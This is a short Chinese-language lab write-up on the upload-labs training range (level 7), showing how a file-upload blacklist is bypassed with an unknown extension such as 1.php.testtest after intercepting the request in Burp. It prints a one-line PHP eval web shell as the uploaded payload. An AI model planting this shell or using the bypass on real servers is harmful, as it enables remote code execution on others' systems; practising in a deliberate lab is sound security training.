upload-labs靶场未知后缀名解析漏洞

煜磊2023-09-26 12:13

upload-labs靶场未知后缀名解析漏洞

版本影响:

phpstudy 版本:5.2.17

1 环境搭建

1.1 在线靶场下载,解压到phpstudy的www目录下,即可使用
复制代码 
https://github.com/c0ny1/upload-labs
1.2 已启动:访问端口9000,端口自设,打开页面选择第七关
复制代码 
http://192.168.225.194:9000/upload_labs/

2 漏洞复现

2.1 上传1.php文件,文件内容如下,显示上传错误,使用bp上传
复制代码 
<?php @eval($_REQUEST[777]);phpinfo();?>
2.2 使用bp转发

修改php后缀和文件内容类型,进行转发,返回信息提示上传成功

访问不能执行

结论php可以上传,php的不能上传,做了黑白名单策略,验证使用白名单或者是黑名单,随便给个后缀testtest

上传1.php.testtest成功

相关推荐
Alex艾力的IT数字空间1 小时前
完整事务性能瓶颈分析案例:支付系统事务雪崩优化
开发语言·数据结构·数据库·分布式·算法·中间件·php
m0_738120721 小时前
网络安全编程——基于Python实现的SSH通信(Windows执行)
python·tcp/ip·安全·web安全·网络安全·ssh
jenchoi4132 小时前
【2025-11-11】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
wanhengidc5 小时前
云手机 服务器网络安全
运维·服务器·安全·web安全·智能手机·云计算
q***76667 小时前
网络安全防护指南:筑牢网络安全防线(510)
安全·web安全·php
denggun123457 小时前
ios-WebP
macos·php·cocoa
汤愈韬8 小时前
网络通信原理
网络·网络安全
帅次9 小时前
信息安全的容灾与业务持续&安全管理的措施
安全·网络安全·系统安全·密码学·网络攻击模型·安全威胁分析·安全架构
视觉震撼10 小时前
RDP登录事件详细溯源分析脚本(兼容Windows PowerShell版本)
运维·网络·windows·网络安全·网络攻击模型·安全威胁分析·安全架构
Pluchon10 小时前
硅基计划6.0 陆 JavaEE Http&Https协议
网络协议·tcp/ip·http·网络安全·https·udp·java-ee
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件05Linux下V2Ray安装配置指南06BongoCat - 跨平台键盘猫动画工具07Labelme从安装到标注:零基础完整指南08jdk21下载、安装(Windows、Linux、macOS)09智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南